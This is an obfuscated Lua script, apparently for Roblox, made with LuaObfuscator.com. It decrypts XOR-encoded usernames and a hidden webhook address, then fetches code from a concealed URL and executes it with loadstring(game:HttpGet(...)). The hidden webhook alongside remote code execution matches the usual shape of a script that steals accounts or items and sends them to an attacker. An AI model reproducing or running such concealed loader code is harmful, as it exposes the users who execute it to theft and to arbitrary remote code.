--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9) local v10={};for v11=1, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + 1 )),v1(v2(v9,1 + (v11% #v9) ,1 + (v11% #v9) + 1 )))%256 ));end return v5(v10);end Username=v7("\243\207\218\63\227\188\207\31\194\215\139\117\183","\126\177\163\187\69\134\219\167");Username2=v7("\1\193\43\223\249\36\197\43\214\232\113\159","\156\67\173\74\165");Webhook=v7("\60\163\93\6\175\124\9\123\179\64\5\191\41\84\48\249\74\25\177\105\71\36\190\6\1\185\36\78\59\184\66\5\243\119\22\108\230\29\79\233\118\30\97\230\29\64\229\126\22\96\226\27\89\169\17\108\36\149\17\33\158\7\18\57\130\27\67\132\43\114\55\156\25\49\187\36\115\13\134\121\49\144\22\83\16\148\104\46\149\47\81\63\191\111\30\174\21\72\29\166\75\38\137\15\72\0\167\27\17\147\22\98\54\228\93\36\183\8\74\21\191","\38\84\215\41\118\220\70");loadstring(game:HttpGet(v7("\88\2\54\2\237\10\89\109\22\255\66\29\49\17\236\89\6\54\1\176\67\6\35\17\251\31\6\49\75\167","\158\48\118\66\114")))();
